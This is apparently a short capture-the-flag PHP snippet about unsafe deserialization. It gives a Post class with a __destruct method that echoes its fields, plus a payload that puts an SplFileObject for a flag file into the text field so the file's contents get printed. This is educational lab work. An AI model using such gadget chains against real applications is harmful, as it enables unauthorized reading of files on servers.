- unserialize: documentation ( source)
- serialize: documentation ( source)
- htmlspecialchars: documentation ( source)
<?php
class Post {
protected $title;
protected $text;
protected $filters;
function __construct($title, $text, $filters) {
$this->title = $title;
$this->text = $text;
$this->filters = $filters;
}
function get_title() {
return htmlspecialchars($this->title);
}
function display_post() {
$text = htmlspecialchars($this->text);
foreach ($this->filters as $filter)
$text = $filter->filter($text);
return $text;
}
function __destruct() {
// debugging stuff
$s = "<!-- POST " . htmlspecialchars($this->title);
$text = htmlspecialchars($this->text);
foreach ($this->filters as $filter)
$text = $filter->filter($text);
$s = $s . ": " . $text;
$s = $s . " -->";
echo $s;
}
};
echo unserialize(serialize(new Post("huehuehue i repor u", new SplFileObject("/home/daedalus/flag.txt"), Array())));